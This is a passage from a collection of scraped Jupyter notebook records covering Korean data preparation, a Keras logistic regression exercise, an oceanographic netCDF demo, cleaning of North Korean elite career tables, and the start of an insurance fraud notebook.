colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 624} id=\"4WZhGtJTip7P\" outputId=\"f0d986d5-3368-4205-dbd8-f04135526211\"\nfinal_data\n\n# + id=\"EIqM9AKzifTv\"\n결측인덱스4 = final_data.isnull().query(\"교과학원분야_소비인구 == True and 동네가게_소비인구 == True\").index\n\n# + id=\"NKZHCEncippE\"\nfinal_data = final_data.drop(결측인덱스4, axis = 0)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 606} id=\"YKNlzLKDitop\" outputId=\"10a1d294-e7a9-47d9-988e-cb370ee7d1ff\"\nfinal_data\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 111} id=\"23obMFDWSBFX\" outputId=\"24787e0e-ca32-494b-9fb7-6c1e0abfb26d\"\nfinal_data[final_data['행정동'].isnull()]\n\n# + id=\"EnsImU5BiyN4\"\nfinal_data = final_data.replace(np.nan, 0)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 606} id=\"zjlIiexui3EV\" outputId=\"c625cd4c-6d2c-4aea-bd73-69d6e121d660\"\nfinal_data\n\n# + id=\"WZOuo0iUi5wF\" colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 529} outputId=\"55f79739-9366-49fe-e90d-7f93f1df4a88\"\ndel final_data['행정동 코드']\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 606} id=\"K3QIB3MNjyHF\" outputId=\"263aaaf3-1fd9-407f-d038-2696823554dc\"\nfinal_data\n\n# + id=\"vOpfS2K5jAPk\"\nfinal_data[final_data['행정동'] == 0]\n\n# + id=\"FrqyiEpujzJs\"\nfinal_data.to_csv('final_clustering.csv',encoding='utf-8-sig')\n\n# + id=\"Ou_-syvFj9ce\"\n\n","repo_name":"jinchank0959/machine-learning-vending-machine","sub_path":"클러스터링_데이터_셋.ipynb","file_name":"클러스터링_데이터_셋.ipynb","file_ext":"py","file_size_in_byte":19884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"36"} +{"seq_id":"31756873821","text":"# Fill in the missing code (#####) to use a NN to define a logistic regression. \n\n# %matplotlib inline\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport tensorflow as tf\ntf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR)\nimport numpy as np\nfrom keras.layers import Dense\nfrom keras.models import Sequential\nfrom keras.optimizers import SGD\nfrom matplotlib import pyplot\nfrom sklearn.datasets import make_regression\nfrom sklearn.preprocessing import StandardScaler\nimport keras\n\n# +\nnum_features = 20\n# generate regression dataset\nX, y = make_regression(n_samples=1000, n_features=num_features, noise=0.1, random_state=1)\n\n# split into train and test\nn_train = 500\ntrainX, testX = X[:n_train, :], X[n_train:, :]\ntrainy, testy = y[:n_train], y[n_train:]\n\n# reshape 1d arrays to 2d arrays\ntrainy = trainy.reshape(len(trainy), 1)\ntesty = testy.reshape(len(trainy), 1)\n\n# create scaler\nscaler = StandardScaler()\n# fit scaler on training dataset\nscaler.fit(trainy)\n# transform training dataset\ntrainy = scaler.transform(trainy)\n# transform test dataset\ntesty = scaler.transform(testy)\n\n# fit scaler on training dataset\nscaler.fit(trainX)\n# transform training dataset\ntrainX = scaler.transform(trainX)\n# transform test dataset\ntestX = scaler.transform(testX)\n# -\n\n#Tranform the trainy and testy data into 1 and 0 labels\n##### as many as needed\ndf = pd.DataFrame(trainy, columns=['y'])\ndf['lab']=np.where(df.y.shift(-1)>df.y,1,0) #like price prediction\ntrainy=df.lab.fillna(0).values\ndf = pd.DataFrame(testy, columns=['y'])\ndf['lab']=np.where(df.y.shift(-1)>df.y,1,0) #like price prediction\ntesty=df.lab.fillna(0).values\n\n# logistic regression with scaled inputs outputs on the regression problem\n# define model\nmodel = Sequential()#####\nmodel.add(Dense(1, activation='sigmoid',kernel_initializer='he_uniform',kernel_regularizer=keras.regularizers.L1L2(l1=0.0, l2=0.1),input_dim=20))#####\n##### as many as needed\n#compile the model\nmodel.compile(optimizer=SGD(lr=0.01, momentum=0.9),loss='binary_crossentropy',metrics=['accuracy'])#####\nhistory = model.fit(trainX, trainy, epochs=100,validation_data=(testX, testy))\n# evaluate the model\ntrain_e = model.evaluate(trainX, trainy, verbose=1)\ntest_e = model.evaluate(testX, testy, verbose=1)\nprint('Train loss: %.3f, Test loss: %.3f' % (train_e[0], test_e[0])) \nprint('Train metric: %.3f, Test metric: %.3f' % (train_e[1], test_e[1])) \n#plot loss during training\nplt.title('Loss / Error')\nplt.plot(history.history['loss'], label='train')\nplt.plot(history.history['val_loss'], label='test')\nplt.legend()\nplt.show()\n\n# For documentation see:\n# https://archive.ph/71Dvs \n","repo_name":"xzq715487899/AI_FINANCE","sub_path":"HWKeras_Steven_Xie/2.NN_logistic_regression_complete.ipynb","file_name":"2.NN_logistic_regression_complete.ipynb","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"36"} +{"seq_id":"72645033064","text":"# + tags=[\"remove-cell\"]\nimport subprocess\nimport sys\n\nCOLAB = \"google.colab\" in sys.modules\n\n\ndef _install(package):\n if COLAB:\n ans = input(f\"Install { package }? [y/n]:\")\n if ans.lower() in [\"y\", \"yes\"]:\n subprocess.check_call(\n [sys.executable, \"-m\", \"pip\", \"install\", \"--quiet\", package]\n )\n print(f\"{ package } installed!\")\n\n\ndef _colab_install_missing_deps(deps):\n import importlib\n\n for dep in deps:\n if importlib.util.find_spec(dep) is None:\n if dep == \"iris\":\n dep = \"scitools-iris\"\n _install(dep)\n\n\ndeps = [\"oceans\", \"pocean-core\"]\n_colab_install_missing_deps(deps)\n# -\n\n# # Creating a CF-1.6 timeSeries using pocean\n#\n# Created: 2018-02-27\n#\n# IOOS recommends to data providers that their netCDF files follow the CF-1.6 standard. In this notebook we will create a [CF-1.6 compliant](https://cfconventions.org/latest.html) file that follows file that follows the [Discrete Sampling Geometries](https://cfconventions.org/Data/cf-conventions/cf-conventions-1.7/build/ch09.html) (DSG) of a `timeSeries` from a pandas DataFrame.\n#\n# The `pocean` module can handle all the DSGs described in the CF-1.6 document: `point`, `timeSeries`, `trajectory`, `profile`, `timeSeriesProfile`, and `trajectoryProfile`. These DSGs array may be represented in the netCDF file as:\n#\n# - **orthogonal multidimensional**: when the coordinates along the element axis of the features are identical;\n# - **incomplete multidimensional**: when the features within a collection do not all have the same number but space is not an issue and using longest feature to all features is convenient;\n# - **contiguous ragged**: can be used if the size of each feature is known;\n# - **indexed ragged**: stores the features interleaved along the sample dimension in the data variable.\n#\n# Here we will use the orthogonal multidimensional array to represent time-series data from am hypothetical current meter. We'll use fake data for this example for convenience.\n#\n# Our fake data represents a current meter located at 10 meters depth collected last week.\n\n# +\nfrom datetime import datetime, timedelta\n\nimport numpy as np\nimport pandas as pd\n\nx = np.arange(100, 110, 0.1)\nstart = datetime.now() - timedelta(days=7)\n\ndf = pd.DataFrame(\n {\n \"time\": [start + timedelta(days=n) for n in range(len(x))],\n \"longitude\": -48.6256,\n \"latitude\": -27.5717,\n \"depth\": 10,\n \"u\": np.sin(x),\n \"v\": np.cos(x),\n \"station\": \"fake buoy\",\n }\n)\n\n\ndf.tail()\n# -\n\n# Let's take a look at our fake data.\n\n# +\n# %matplotlib inline\n\n\nimport matplotlib.pyplot as plt\nfrom oceans.plotting import stick_plot\n\nq = stick_plot([t.to_pydatetime() for t in df[\"time\"]], df[\"u\"], df[\"v\"])\n\nref = 1\nqk = plt.quiverkey(\n q, 0.1, 0.85, ref, f\"{ref} m s$^{-1}$\", labelpos=\"N\", coordinates=\"axes\"\n)\n\nplt.xticks(rotation=70)\n# -\n\n# `pocean.dsg` is relatively simple to use. The user must provide a DataFrame, like the one above, and a dictionary of attributes that maps to the data and adhere to the DSG conventions desired.\n#\n# Because we want the file to work seamlessly with ERDDAP we also added some ERDDAP specific attributes like `cdm_timeseries_variables`, and `subsetVariables`.\n\nattributes = {\n \"global\": {\n \"title\": \"Fake mooring\",\n \"summary\": \"Vector current meter ADCP @ 10 m\",\n \"institution\": \"Restaurant at the end of the universe\",\n \"cdm_timeseries_variables\": \"station\",\n \"subsetVariables\": \"depth\",\n # These are only the required attributions from\n # https://ioos.github.io/ioos-metadata/ioos-metadata-profile-v1-2.html#attribution\n \"creator_country\": \"USA\",\n \"creator_email\": \"fake_email@somedomain.org\",\n \"creator_institution\": \"IOOS\",\n \"creator_sector\": \"academic\",\n \"creator_url\": \"https://ioos.github.io/ioos_code_lab/content/intro.html\",\n \"publisher_country\": \"USA\",\n \"publisher_email\": \"fake_email@somedomain.org\",\n \"publisher_institution\": \"IOOS\",\n \"publisher_url\": \"https://ioos.github.io/ioos_code_lab/content/intro.html\",\n },\n \"longitude\": {\n \"units\": \"degrees_east\",\n \"standard_name\": \"longitude\",\n },\n \"latitude\": {\n \"units\": \"degrees_north\",\n \"standard_name\": \"latitude\",\n },\n \"z\": {\n \"units\": \"m\",\n \"standard_name\": \"depth\",\n \"positive\": \"down\",\n },\n \"u\": {\n \"units\": \"m/s\",\n \"standard_name\": \"eastward_sea_water_velocity\",\n },\n \"v\": {\n \"units\": \"m/s\",\n \"standard_name\": \"northward_sea_water_velocity\",\n },\n \"station\": {\"cf_role\": \"timeseries_id\"},\n}\n\n# We also need to map the our data axes to `pocean`'s defaults. This step is not needed if the data axes are already named like the default ones.\n\naxes = {\"t\": \"time\", \"x\": \"longitude\", \"y\": \"latitude\", \"z\": \"depth\"}\n\n# +\nfrom pocean.dsg.timeseries.om import OrthogonalMultidimensionalTimeseries\nfrom pocean.utils import downcast_dataframe\n\ndf = downcast_dataframe(df) # safely cast depth np.int64 to np.int32\ndsg = OrthogonalMultidimensionalTimeseries.from_dataframe(\n df,\n output=\"fake_buoy.nc\",\n attributes=attributes,\n axes=axes,\n)\n# -\n\n# The `OrthogonalMultidimensionalTimeseries` saves the DataFrame into a CF-1.6 TimeSeries DSG.\n\n# !ncdump -h fake_buoy.nc\n\n# It also outputs the dsg object for inspection. Let us check a few things to see if our objects was created as expected. (Note that some of the metadata was \"free\" due t the built-in defaults in `pocean`.\n\ndsg.getncattr(\"featureType\")\n\ntype(dsg)\n\n# In addition to standard `netCDF4-python` object `.variables` method `pocean`'s DSGs provides an \"categorized\" version of the variables in the `data_vars`, `ancillary_vars`, and the DSG axes methods.\n\n[(v.standard_name) for v in dsg.data_vars()]\n\ndsg.axes(\"T\")\n\ndsg.axes(\"Z\")\n\ndsg.vatts(\"station\")\n\ndsg[\"station\"][:]\n\ndsg.vatts(\"u\")\n\n# We can easily round-trip back to the pandas DataFrame object.\n\ndsg.to_dataframe().head()\n\n# For more information on `pocean` please check the [docs](https://pyoceans.github.io/pocean-core/).\n","repo_name":"ioos/ioos_code_lab","sub_path":"jupyterbook/content/code_gallery/data_management_notebooks/2018-02-27-pocean-timeSeries-demo.ipynb","file_name":"2018-02-27-pocean-timeSeries-demo.ipynb","file_ext":"py","file_size_in_byte":6169,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-jupyter-script","pt":"36"} +{"seq_id":"33818589123","text":"import pandas as pd\nimport numpy as np\n\n# # Tables\n#\n# ### 1. LeaderCareerLink (LeaderID, CareerString, CareerDateString_2022)\n#\n# matches LeaderID with (CareerString, CareerDateString_2022)\n#\n# - LeaderID\n# - CareerString\n# - CareerDateString_2022\n#\n# ### 2. CareerOrgLink (CareerString, CareerDateString_2022, CareerSubstring)\n#\n# matches (CareerString,CareerDateString_2022,CareerSubstring) with (InstitutionType,PrimaryInstitution,OrgName,Position)\n#\n# - CareerString\n# - CareerDateString_2022\n# - IsJob\n# - MultipleSubstrings\n# - CareerStartYear\n# - CareerStartMonth\n# - CareerSubstring\n# - OrgString\n# - InstitutionType\n# - PrimaryInstitution\n# - OrgName\n# - Position\n# - Notes\n#\n# ### 3. Orgtree (InstitutionType, PrimaryInstitution, OrgName)*\n#\n# contains variables relevant to all (PI, Org) including PI/Org Types, Positions, Org/Pos Ranks, PI/Org Links, Aliases\n#\n# - InstitutionType\n# - OrgType\n# - PrimaryInstitution\n# - OrgName\n# - PI_Index\n# - OrgRank\n# - P1\n# - P2\n# - P3\n# - LinkToNext_PI\n# - LinkToNext_Org\n# - LinkToNext_Year\n# - Alias_OrgName\n# - Notes\n\npath_tables = \"C:/Users/seoul/Dropbox/00 technical/github/nkelites/data/combined data/combined data - 2 tables/\"\n\n# current, but I won't use them in 2.6.1.1\nfilename_careers = \"careers.xlsx\"\nfilename_leadercareerlink = \"leadercareerlink.xlsx\"\n\n# +\n# deprecated\n\n# filename_leaderjoblink = \"leaderjoblink.xlsx\"\n# filename_joborglink = \"joborglink.xlsx\"\n\n# +\n# filenames of tables to output\n\nfilename_careerorglink = \"careerorglink.xlsx\"\nfilename_orgtree = \"orgtree.xlsx\"\n# -\n\n# # Data - initial orgtree + manually cleaned data in 2.7 orgtree position & rank\n\npath_cleaning = \"C:/Users/seoul/Dropbox/00 technical/github/nkelites/data/combined data/combined data - 1 cleaning/cleaning step 2 - career/\"\n\nsubpath_2_1 = \"2.1 career_undivided_unparsed_uncoded/\"\nsubpath_2_2 = \"2.2 career_divided_unparsed_uncoded/\"\nsubpath_2_3 = \"2.3 joborglink/\"\nsubpath_2_4 = \"2.4 orgtree/\"\nsubpath_2_5 = \"2.5 position/\"\nsubpath_2_6 = \"2.6 career_reassembled/\"\nsubpath_2_7 = \"2.7 orgtree position & rank/\"\n\n# +\n# old careers table, merged with orgs \n\nfilename_careers = \"2.0_careerorglink.xlsx\"\ncareers = pd.read_excel(path_cleaning + subpath_2_7 + filename_careers,dtype=\"str\")\ncareers.shape\n# -\n\ncareers[careers[\"CareerString\"].isna()]\n\n# +\n# 1.1 orgtree_position_rank\n\n# constructed new file from:\n## 2022 북한_기관별_인명록_북한정보포털 게재용 + old orgtree table\n\nfilein_opr = \"1.1 orgtree_position_rank.xlsx\"\nopr = pd.read_excel(path_cleaning + subpath_2_7 + filein_opr,dtype=\"str\")\nopr.shape\n# -\n\nopr.head(2)\n\n# +\n# 2.0_mismatch_\n\n# 2.0_mismatch_정권_1_Esther\n# 2.0_mismatch_정권_1_Jeongsu\n# 2.0_mismatch_당_1_Esther_August.6.ES\n# 2.0_mismatch_당_1_Jeongsu\n# 2.0_mismatch_군및기타_1_ingov_JS\n# 2.0_mismatch_군및기타_1_outgov_JR\n\nmismatch_filenames = [\n \"2.0_mismatch_정권_2_Jacob.xlsx\",\n \"2.0_mismatch_당_2_Jacob.xlsx\",\n \"2.0_mismatch_군및기타_1_ingov_JS.xlsx\",\n \"2.0_mismatch_군및기타_1_outgov_JR.xlsx\"\n]\n\n# +\n# select columns in mismatch dfs\n\nmismatch_columns = [\"CareerString\", \"CareerStartYear\", \"MultipleSubstrings\", \"CareerSubstring\", \"IsJob\",\n \"InstitutionType\", \"PrimaryInstitution\", \"OrgName\", \"Position\", \"LinkToNext_Year\",\n \"Resolution\", \"Change_PI\", \"Change_OrgName\", \"Change_Position\",\"Notes\"]\n\n# +\n# read in mismatch dfs\n\nm_dfs = []\n\nfor filename in mismatch_filenames:\n df = pd.read_excel(path_cleaning + subpath_2_7 + filename,sheet_name=\"Sheet1\",dtype=\"str\")\n df = df[mismatch_columns]\n print(df.shape)\n m_dfs.append(df)\n\nprint(len(m_dfs))\n\n# +\n# concat mismatch dfs into a single df\n\nm = pd.concat(m_dfs)\nm.shape\n# -\n\nm.head(2)\n\n\n# # Functions: format orgtree\n\n# +\n# using this on (PI,OrgName) will ensure unique & non-null keys\n# using this on a larger df will ensure unique rows and non-null keys, but not unique keys\n\ndef unique_non_null_rows(olddf):\n \n df = olddf.copy()\n \n \n ### drop duplicates\n df = df.drop_duplicates(keep=\"first\",ignore_index=True)\n\n ### drop null rows\n df.dropna(how=\"all\",axis=0,inplace=True)\n \n # drop rows with null PI\n df = df[~(df[\"PrimaryInstitution\"].isna())]\n \n ### drop rows where PI contains stop words\n stop_words_lower = [\"uncertain\",\"current\",\"deprecated\",\"please_revise\"]\n df = df[ ~ df[\"PrimaryInstitution\"].str.lower().isin(stop_words_lower)]\n \n\n print(\"\\nUnique Non-null Rows...\")\n print(\"\")\n print(\"\\tNon-unique rows:\",olddf.shape)\n print(\"\\tUnique rows :\",df.shape)\n\n ### sort\n df = df.sort_values([\"PrimaryInstitution\",\"OrgName\"])\n \n return df\n\n\n# -\n\ndef verify_unique_rows(df):\n \n key_columns = [\"PrimaryInstitution\",\"OrgName\"]\n print(\"\\nVerifying Unique Rows...\")\n print(\"\")\n print(\"\\tDuplicate Rows:\",df[df.duplicated(keep=False)].shape)\n print(\"\\tDuplicate Keys:\",df[df.duplicated(key_columns,keep=False)].shape)\n print(\"\\tNull Rows :\",df[df[\"PrimaryInstitution\"].isna() & df[\"OrgName\"].isna()].shape)\n\n\ndef merge_results(m):\n \n print(\"\\nMerge Results...\")\n print(\"\")\n print(\"\\tshape :\",m.shape)\n print(\"\\tleft_only :\",m[m[\"_merge\"]==\"left_only\"].shape)\n print(\"\\tboth :\",m[m[\"_merge\"]==\"both\"].shape)\n print(\"\\tright_only:\",m[m[\"_merge\"]==\"right_only\"].shape)\n\n\ndef update_opr_index(opr,max_level):\n \n # create and clear out existing Level Indicies\n opr[\"OrgRank\"]=np.nan\n opr[\"L1_Index\"]=np.nan\n opr[\"L2_Index\"]=np.nan\n opr[\"L3_Index\"]=np.nan\n opr[\"L4_Index\"]=np.nan\n opr[\"L5_Index\"]=np.nan\n \n # pad PI_Index with missing 0s up to the deepest level (4 or 5?)\n opr[\"PI_Index\"] = opr.apply(lambda x: str(x[\"PI_Index\"]) + ((max_level-1)-str(x[\"PI_Index\"]).count(\".\")) * \".0\",axis=1)\n \n # calculate OrgRank\n opr[\"OrgRank\"] = opr.apply(lambda x: (max_level-1) - str(x[\"PI_Index\"]).count(\".0\"),axis=1)\n \n # populate Level Indices using PI_Index\n opr.loc[opr[\"PI_Index\"].notna(),\"L1_Index\"] = opr.loc[opr[\"PI_Index\"].notna()].apply(lambda x: str(x[\"PI_Index\"]).split(\".\")[0],axis=1)\n opr.loc[opr[\"PI_Index\"].notna(),\"L2_Index\"] = opr.loc[opr[\"PI_Index\"].notna()].apply(lambda x: str(x[\"PI_Index\"]).split(\".\")[1],axis=1)\n opr.loc[opr[\"PI_Index\"].notna(),\"L3_Index\"] = opr.loc[opr[\"PI_Index\"].notna()].apply(lambda x: str(x[\"PI_Index\"]).split(\".\")[2],axis=1)\n opr.loc[opr[\"PI_Index\"].notna(),\"L4_Index\"] = opr.loc[opr[\"PI_Index\"].notna()].apply(lambda x: str(x[\"PI_Index\"]).split(\".\")[3],axis=1)\n opr.loc[opr[\"PI_Index\"].notna(),\"L5_Index\"] = opr.loc[opr[\"PI_Index\"].notna()].apply(lambda x: str(x[\"PI_Index\"]).split(\".\")[4],axis=1)\n\n # sort by Level1, Level2, Level3\n sort_columns = [\"L1_Index\",\"L2_Index\",\"L3_Index\",\"L4_Index\",\"L5_Index\"]\n #opr.L1_Index.astype(int,errors=\"ignore\")\n #opr.L2_Index.astype(int,errors=\"ignore\")\n #opr.L3_Index.astype(int,errors=\"ignore\")\n opr.sort_values(sort_columns,inplace=True)\n \n return opr\n\n\n# +\n# opr = update_opr_index(opr,5)\n\n# +\n# export opr\n\n# fileout_opr = \"1.0 orgtree_position_rank.xlsx\"\n# opr.to_excel(path_cleaning + subpath_2_7 + fileout_opr,index=False)\n# -\n\n# # Recall from earlier cleaning\n#\n# #### Three Cases of OrgName in NK elite career data\n#\n# - Case 0: OrgName in 기관별인명록: code these from 1-199\n# - Case 1: OrgName not in 기관별인명록, but contained in data AND LinkToNext_Year not current: code as 500+\n# - Case 2: OrgName not in 기관별인명록, but contained in data AND LinkToNext_Year is current: code as 200+\n#\n# #### Case 0: OrgName in 기관별인명록\n#\n# - Update 1.0 orgtree_position_rank with OrgName in 기관별인명록\n# - Code these from 1-199\n# - Run above routine # 1. orgtree_position_rank: update all besides 노동당, 내각, 정무원\n# - to update opr & pr_else3\n# - Proceed to Cases 1 & 2\n#\n# #### Resolve. Validation values for resolving null Position_3P\n#\n# 1. OrgName & Position ok. Add Position to P1\n# 2. OrgName & Position ok. Add Position to P2\n# 3. OrgName & Position ok. Add Position to P3\n# 4. Change_OrgName and/or Change_Position\n# 5. Uncertain OrgName\n# 6. Uncertain Position\n# 7. NotJob\n# 8. Multiple CareerSubstring\n# 9. Other - see Notes\n\n# # Task 1. Prep & Merge Mismatch\n#\n# - NotJob\n# - careers: change IsJob from True to False\n# - m: remove rows \n# - opr: NA\n# \n# - MultipleSubstrings\n# - careers: expand rows\n# - m: expand rows and code\n# - opr: NA\n# \n# - Merge mismatch files\n\nm_notjob_columns = [\"CareerString\",\"CareerStartYear\",\"CareerSubstring\"]\n# m_notjob = m[(m.IsJob==\"False\") | (m.Resolution==\"7. NotJob\")]\nm_notjob = m.loc[(m.IsJob==\"False\") | (m.Resolution==\"7. NotJob\"),m_notjob_columns]\nm_notjob.shape\n\nm_notjob.drop_duplicates(inplace=True)\nm_notjob.shape\n\ncareers1 = careers.merge(m_notjob,on=m_notjob_columns,how=\"left\",indicator=True)\nmerge_results(careers1)\n\n# +\n# careers1[careers1[\"_merge\"]==\"both\"]\n# -\n\ncareers1.loc[careers1[\"_merge\"]==\"both\",\"IsJob\"]=\"False\"\n\nm1 = m[~((m.IsJob==\"False\") | (m.Resolution==\"7. NotJob\"))]\nm1.shape\n\ncareers1.drop(columns=[\"_merge\"],inplace=True)\ncareers1.shape\n\n# confirm no cases of IsJob = False\nm1[(m1.IsJob==\"False\") | (m1.Resolution==\"7. NotJob\")].shape\n\n# confirm no cases of 8. Multiple CareerSubstring\nm_msub = m[m.Resolution==\"8. Multiple CareerSubstring\"]\nm_msub.shape\n\n# +\n\ncareerorglink_columns = [\"CareerString\", \"CareerDateString_2022\", \"IsJob\", \"MultipleSubstrings\", \n \"CareerStartYear\", \"CareerStartMonth\", \"CareerSubstring\", \n \"OrgString\", \"InstitutionType\", \"PrimaryInstitution\", \"OrgName\", \"Position\", \"Notes\"]\ncareers1[\"InstitutionType\"]=np.nan\ncareers1 = careers1[careerorglink_columns]\n# -\n\n# export careerorglink to cleaning\nfilename_careerorglink_new = \"2.1 careerorglink.xlsx\"\ncareers1.to_excel(path_cleaning + subpath_2_7 + filename_careerorglink_new,index=False)\n\n# export merged mismatches to cleaning\nfilename_mimatch = \"2.1 mismatch_통합.xlsx\"\nm1.to_excel(path_cleaning + subpath_2_7 + filename_mimatch,index=False)\n\n# +\n### these tables not changed\n\n# orgtree (1.1 orgtree_position_rank)\n# leadercareerlink\n# -\n\n# # Task 2. Edit & Validate PI, OrgName, Type, Index\n#\n#\n# - Change_PI, Change_OrgName\n# - For 200 & 500 series PrimaryInstitutions, search whether they are contained in OrgName, within a PrimaryInstitution\n# \t- 인민회의 or 인민위원회?\n# - 노동당 총정치국 --> 인민군 총정치국\n# - alias the PrimaryInstitutions, 내각, 내각A, 내각B, 등 at least when calculating whether transitions are between or across institutions\n# - add 북조선노동당 as an alias to 노동당\n#\n#\n\n# - Review Integrity Checks & Adjust Mismatches\n# - Validate InstitutionType, OrgType\n# - Data in Careers but not in Orgtree\n# - Orgs in Orgtree but not in Careers or 기관별인명록\n# - Verify no Positions overlapping within the same PI, OrgName\n\n# - Recode & Recategorize some (PI,OrgName)\n# - 중앙위원회\n# - 인민군, 총참모부, 인민무력부, \n# - 국방위원회: 인민군?\n# - 중앙인민위원회: 정권기관\n# - 국제친선기관: I will add and match existing ones\n# - 노동당 - fix the old party organization\n# - https://encykorea.aks.ac.kr/Article/E0070188\n# - 1947년 북조선로동당 ‘5과’로 창설되었다. 6·25전쟁기 남한지역 내 게릴라부대의 지하당 공작 과정에서 대남 공작기구를 확대하면서 당 조직부 내의 연락부를 분리했다. 1961년 4차 당대회에서 남한에서의 지하당 조직 확대와 통일전선 강화 등의 결정과 함께 내무성 등의 대남 공작기구를 통합해 중앙당 ‘연락국’을 신설했다. 1964년 2월 조선로동당 중앙위원회 4기 8차 전원회의에서 ‘3대 혁명력량 강화’노선을 채택하면서 종래의 연락국을 ‘대남사업총국’으로 개칭했다.\n# - 1966년 10월 12일 당 중앙위원회 4기 14차 전원회의에서 비서국이 신설되면서 대남사업담당비서 산하에 ‘연락부’, ‘문화부’, ‘조사부’, ‘인민무력부정착국’, ‘조총련’부서를 두었으며, 1978년 1월 통일전선부가, 1990년대 후반 35호실(대외정보조사부)과 작전부가 신설됨으로써 대남 담당 부서의 체계가 구축되었다. 남한 내 정당, 사회단체, 군부에 대한 공작 거점 및 공작 전술 연구개발 업무를 수행하고 있다. 특히 간첩교육과 파견을 직접 담당하고 있으며, 조총련에 대한 활동 지도도 담당하고 있다.\n# \n# - 내각 & 정무원\n# - How different was their organization?\n# - https://encykorea.aks.ac.kr/Article/E0066727 - Let's alias. It seems like the name simply changed from 내각 (1948) --> 정무원 (1972) --> 내각 (1998)\n# - Do we need to duplicate the entire 내각 structure for 정무원?\n# - At the very least, should we swap out 내각 for 정무원 in cases where data are labelled as 내각 but during 정무원 periods (pre-1998)?\n# - If the internal organization was quite similar, then maybe we could just alias 내각 and 정무원 and not worry about replicating the organization three\n# - 인도기관?\n# - 국방위원회\n# - 국무위원회\n# - resolve differences between InstitutionType, PrimaryInstitution, OrgName\n# - for PI=총참모부, rename PI=인민군, OrgName = 총참모부_; and remove duplicates. e.g., 총참모부_작전총국\n# - 노동당, 당중앙위원회\n# - many organizations for whom 중앙위원회 is their main leadership body\n# - 인민군. remove as PrimaryInstitution, and use as InstitutionType instead\n# - https://encykorea.aks.ac.kr/Article/E0066687\n# - 인민무력부, 인민무력성, \n# \t\t- PrimaryInstitutions\n# \t\t\t- 최고사령부\n# \t\t\t- 총참모부\n# \t\t\t- 주요 사령부\n# \t\t\t- 등\n# - Make sure X.0.0.0 positions are not being duplicated with X.1.0.0 positions, especially in the case of 중앙위원회\n# - Discuss X in PI_Index\n# - 비서국A --> 정무국 --> 비서국B\n# - check for duplicates: 당 비서국\n# - 당중앙위원회_정치위원회 (폐지) 직급\n# - 당중앙위원회_총정치국 - 당/인민군\n# - 당중앙위원회_조선혁명박물관당위원회 & other 1.1.X.0.0 - double-check if they are included in 외곽단 - InGov?\n# - Change_OrgName to 당중앙위원회_X\n# - 비서국_인민무력부B\n# - 비서국_인민무력부B_보위국\n# - 비서국_인민무력부B_작전국\n# - 비서국_인민무력부B_정치안전국\n#\n#\n#\n#\n\n# - Re-Index\n# - See PI-Index Coding Rules in Evernote\n# - Update X codes with 200 or 500. Delete any 200/500 which don't appear in our data. (They might have been orgs we corrected in the data.)\n# - 최고인민회의 X지역인민회의 - move from 200 Series to 0 Series\n# - Drop X지역위원회 and recode 200 Series to 0 Series\n# - Change coding of 당외곽 및 사회단체\n# - if the orgs were found in the 별책, then change their codes from 200 series to 100 series\n# - Match, rename and recode (from 500+ to 100+) 500 series 국제친선기관\n# - code data source rather than index\n#\n#\n\n# # Task 3. Add OrgType & other metadata\n#\n# - Add OrgType\n#\n\n# # Future Tasks\n#\n# - Future Integrity Checks & Data Cleaning\n# - Identify inconsistencies in Position Rankings (e.g., 명예위원장)\n# - Verify (PI, OrgName) not found in 기관별인명록\n# - Research X entries: e.g., 3.525.591: 내각_외무성_X국_대사관\n# - Reconcile 기관 across three categories: 기타기관, 당외곽및사회단체, 당외곽및사회단체(별책)\n# - Add more orgs\n# - Expand any X지역위원회 into full list\n# - 내각 - Level 2 or Level 3?\n# - orgs after 내각 국토환경보호성_산림총국\n# - orgs after 내각 대외경제성_민족경제협력위원회\n# - orgs after 내각 보건성_중앙의약품관리소\n# - orgs after 내 각 상업성_중앙도매소\n# - 내각 정보산업성 우편국, 전화국, 체신관리국, 체신소, \n# - 내각 (45)\n# - 당외곽및사회단체 (별책)\n# - - Discussion about matching levels\n# - https://namu.wiki/w/ - consider the OrgRang of 김정은의 겸직\n# \t\t- 조선민주주의인민공화국 국무위원회 위원장[국가원수]\n# \t\t- 조선로동당 중앙군사위원장\n# \t\t- 조선민주주의인민공화국무력 최고사령관\n# \t\t- 조선로동당 중앙위원회 정치국 상무위원\n\n\n","repo_name":"seouljake/nkelites","sub_path":"scripts/1 scripts - data cleaning and structuring/2 career/2.6.1.1 prep tables task 1_prep & merge mismatches.ipynb","file_name":"2.6.1.1 prep tables task 1_prep & merge mismatches.ipynb","file_ext":"py","file_size_in_byte":16848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"30"} +{"seq_id":"20301527419","text":"# # Randomized a Dataframe\n\n# +\n# we would use shuffle to randomize the data\nimport pandas as pd\nfrom random import shuffle\n\n\n# -\n\ndf = pd.read_csv('data/geography.csv',sep=\";\")\ndf.head()\n\n#shuffle to every column\nfor col in df.columns:\n columntoRandom = df[col]\n shuffle(columntoRandom)\n\n\n#check the resutls\ndf.head()\n\n#safe\ndf2_final.to_csv (r'data\\geography_randomice.csv',sep=\";\", index = None, header=True)\n\n# ### End\n","repo_name":"Enrique1987/python-data-analysis","sub_path":"Randomize_existing_Dataframe.ipynb","file_name":"Randomize_existing_Dataframe.ipynb","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"30"} +{"seq_id":"33971114806","text":"# # Insurance Claims- Fraud Detection\n#\n# Problem Statement:\n# Business case:\n# Insurance fraud is a huge problem in the industry. It's difficult to identify fraud claims. Machine Learning is in a unique position to help the Auto Insurance industry with this problem.\n#\n# In this project, you are provided a dataset which has the details of the insurance policy along with the customer details. It also has the details of the accident on the basis of which the claims have been made. \n#\n# In this example, you will be working with some auto insurance data to demonstrate how you can create a predictive model that predicts if an 